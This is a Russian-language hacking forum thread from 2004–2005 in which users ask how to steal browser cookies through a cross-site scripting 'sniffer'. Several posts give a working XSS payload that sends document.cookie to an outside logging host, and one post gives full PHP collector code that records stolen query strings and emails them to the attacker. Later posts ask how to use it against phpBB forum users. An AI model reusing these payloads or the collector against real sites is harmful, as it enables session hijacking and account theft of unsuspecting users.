Вопрос про отправку кук на сниффер http://antichat.ru/cgi-bin/s.jpg?

Discussion in 'Песочница' started by Guest, 23 Jul 2004.

  1. Guest

    Guest Guest

    Reputations:
    0
    Я конечно дико извиняюсь за свое ламерство, но скажите мне пожалуйста вот что:
    Что мне нужно ставить после http://antichat.ru/cgi-bin/s.jpg? чтобы он отправил мне куки? (+document.cookie не катит...или я совсем дурак =( т.е. сниффер прокатывает, лог ведется, а куки не отправляются
     
  2. Algol

    Algol New Member

    Joined:
    29 May 2002
    Messages:
    1,759
    Likes Received:
    4
    Reputations:
    0
    В примерах же описано
    </span><table border="0" align="center" width="95%" cellpadding="3" cellspacing="1"><tr><td>Исходный код </td></tr><tr><td id="CODE">
    <script>img = new Image(); img.src = "http://antichat.ru/cgi-bin/s.jpg?"+document.cookie;</script>
    [/QUOTE]<span id='postcolor'>
     
  3. Liss

    Liss New Member

    Joined:
    23 Jul 2004
    Messages:
    1
    Likes Received:
    0
    Reputations:
    0
    че то вот эта связка как раз и не работает. Я тестил так: создал док. на локальном компе и сам же туда и зашел. В логах отобразилось что я там был, но куков не отправилось
     
  4. Algol

    Algol New Member

    Joined:
    29 May 2002
    Messages:
    1,759
    Likes Received:
    4
    Reputations:
    0
    Парень, почитай что такое куки вообще.... А потом уже задавай вопросы...
     
  5. Че Гевара

    Че Гевара Elder - Старейшина

    Joined:
    5 Oct 2003
    Messages:
    1,049
    Likes Received:
    29
    Reputations:
    8
    Liss, с помощью джаваскрипта можно получить кукисы только текущего документа ...

    Если вставить сниффер, например, на главную страничку античата, то содержимое кукисов будет:
    </span><table border="0" align="center" width="95%" cellpadding="3" cellspacing="1"><tr><td>Исходный код </td></tr><tr><td id="CODE">
    hotlog=1; hotlog=1
    [/QUOTE]<span id='postcolor'>
    Это кукисы счетчика хотлог ...

    Как видишь, куки от mail.ru здесь не фигурируют ... [​IMG]
     
  6. zFailure

    zFailure Elder - Старейшина

    Joined:
    6 Jun 2004
    Messages:
    163
    Likes Received:
    24
    Reputations:
    24
    проще говоря
    для каждого домена свои куки
    соответственно, в каком домене исполняется JavaScript к тем кукам он и имеет доступ
     
  7. жека

    жека New Member

    Joined:
    10 Oct 2004
    Messages:
    10
    Likes Received:
    0
    Reputations:
    0
    </span><table border="0" align="center" width="95%" cellpadding="3" cellspacing="1"><tr><td>Цитата (Algol @ июля 23 2004,19:28)</td></tr><tr><td id="QUOTE">В примерах же описано
    </span><table border="0" align="center" width="95%" cellpadding="3" cellspacing="1"><tr><td>Исходный код </td></tr><tr><td id="CODE">
    <script>img = new Image(); img.src = "http://antichat.ru/cgi-bin/s.jpg?"+document.cookie;</script>
    [/QUOTE]<span id='postcolor'>[/QUOTE]<span id='postcolor'>
    Шановний, а ви не могли б розповісти, як вставити ЦЕ в повідомлення, якщо на форумі нема тегу [video] (не знаю чому [​IMG] )? Будь-ласка, без жаргону, а то ламери типу мене не розуміють...
     
  8. Algol

    Algol New Member

    Joined:
    29 May 2002
    Messages:
    1,759
    Likes Received:
    4
    Reputations:
    0
    </span><table border="0" align="center" width="95%" cellpadding="3" cellspacing="1"><tr><td>Цитата (жека @ октября 10 2004,17:12)</td></tr><tr><td id="QUOTE">Шановний, а ви не могли б розповісти, як вставити ЦЕ в повідомлення, якщо на форумі нема тегу [video] (не знаю чому [​IMG] )? Будь-ласка, без жаргону, а то ламери типу мене не розуміють...[/QUOTE]<span id='postcolor'>
    Что бы мы все тут делали, если бы это было так легко рассказать? ))
    Это ж искусство))
     
  9. DOKTOP_CMEPTb

    DOKTOP_CMEPTb New Member

    Joined:
    1 Oct 2004
    Messages:
    2
    Likes Received:
    0
    Reputations:
    0
    А это че озназает - img = new Image();
    Скажите Пллиз !!!
     
  10. zFailure

    zFailure Elder - Старейшина

    Joined:
    6 Jun 2004
    Messages:
    163
    Likes Received:
    24
    Reputations:
    24
    переменной img присваевается талько что созданный экземпляр объекта класса &nbsp;Image

    ну короче картинка с именем img создается по простому
     
  11. salop

    salop New Member

    Joined:
    10 Oct 2004
    Messages:
    8
    Likes Received:
    0
    Reputations:
    0
  12. zFailure

    zFailure Elder - Старейшина

    Joined:
    6 Jun 2004
    Messages:
    163
    Likes Received:
    24
    Reputations:
    24
    $_COOKIE[&quot;переменная&quot;];

    или массив
    implode('', $_COOKIE);
     
  13. salop

    salop New Member

    Joined:
    10 Oct 2004
    Messages:
    8
    Likes Received:
    0
    Reputations:
    0
    спасибо тебе
     
  14. salop

    salop New Member

    Joined:
    10 Oct 2004
    Messages:
    8
    Likes Received:
    0
    Reputations:
    0
    чтото неполучаеться у меня...можеш написать код пожалуйста ?
     
  15. zFailure

    zFailure Elder - Старейшина

    Joined:
    6 Jun 2004
    Messages:
    163
    Likes Received:
    24
    Reputations:
    24
    если ты имеешь ввиду код снифера, то вот

    </span><table border="0" align="center" width="95%" cellpadding="3" cellspacing="1"><tr><td>Исходный код </td></tr><tr><td id="CODE"><?

    $filename = 'sniff.txt';
    $somecontent = date("l dS of F Y h:i:s A") .
    "\r\nSERVER_ADDR = " . $_SERVER["SERVER_ADDR"] .
    (isset($_SERVER["HTTP_REFERER"]) ? "\r\nHTTP_REFERER = " . $_SERVER["HTTP_REFERER"] : '') .
    "\r\nQUERY_STRING = " . $_SERVER["QUERY_STRING"] . "\r\n\r\n";

    mail('[email protected]', 'sniff', $somecontent);

    // Let's make sure the file exists and is writable first.
    if (is_writable($filename)) {

       // In our example we're opening $filename in append mode.
       // The file pointer is at the bottom of the file hence
       // that's where $somecontent will go when we fwrite() it.
       if (!$handle = fopen($filename, 'a')) {
            echo "Cannot open file ($filename)";
            exit;
       }

       // Write $somecontent to our opened file.
       if (fwrite($handle, $somecontent) === FALSE) {
           echo "Cannot write to file ($filename)";
           exit;
       }
       
       //echo "Success, wrote ($somecontent) to file ($filename)";
       
       fclose($handle);
                       
    } else {
       echo "The file $filename is not writable";
    }

    ?>[/QUOTE]<span id='postcolor'>
     
  16. salop

    salop New Member

    Joined:
    10 Oct 2004
    Messages:
    8
    Likes Received:
    0
    Reputations:
    0
    спасибо...пригодиться...но этот снифер не тянет куки
     
  17. zFailure

    zFailure Elder - Старейшина

    Joined:
    6 Jun 2004
    Messages:
    163
    Likes Received:
    24
    Reputations:
    24
    этот снифер тянет все что ему дать

    а куки можно утянуть только одним способом
    ...='http://.../1.php?'+document.cookie т.е. через QUERY_STRING
     
  18. Algol

    Algol New Member

    Joined:
    29 May 2002
    Messages:
    1,759
    Likes Received:
    4
    Reputations:
    0
    2salop
    Тянуть куки пхп-шным $_COOKIE[&quot;переменная&quot;]; бесполезно, поскольку так ты получишь совсем не те куки, на которые рассчитываешь))
     
  19. X-Seven

    X-Seven New Member

    Joined:
    7 Nov 2004
    Messages:
    4
    Likes Received:
    0
    Reputations:
    0
    А как этим сниффером можно потянуть куки phpbb2.0.10?
    Если вставлять через как картинку,то в логах
    фиксируется только ip и урл.Есть какие-нибудь способы?
     
  20. Zadoxlik

    Zadoxlik рояль с сыром

    Joined:
    28 Feb 2005
    Messages:
    758
    Likes Received:
    216
    Reputations:
    257
    <span id='postcolor'>[/QUOTE]<span id='postcolor'>
    Шановний, а ви не могли б розповісти, як вставити ЦЕ в повідомлення, якщо на форумі нема тегу [video] (не знаю чому [​IMG] )? Будь-ласка, без жаргону, а то ламери типу мене не розуміють...[/QUOTE]



    Ой не могу =))) сердце аж прихватило =)))) я плакаль
     
Loading...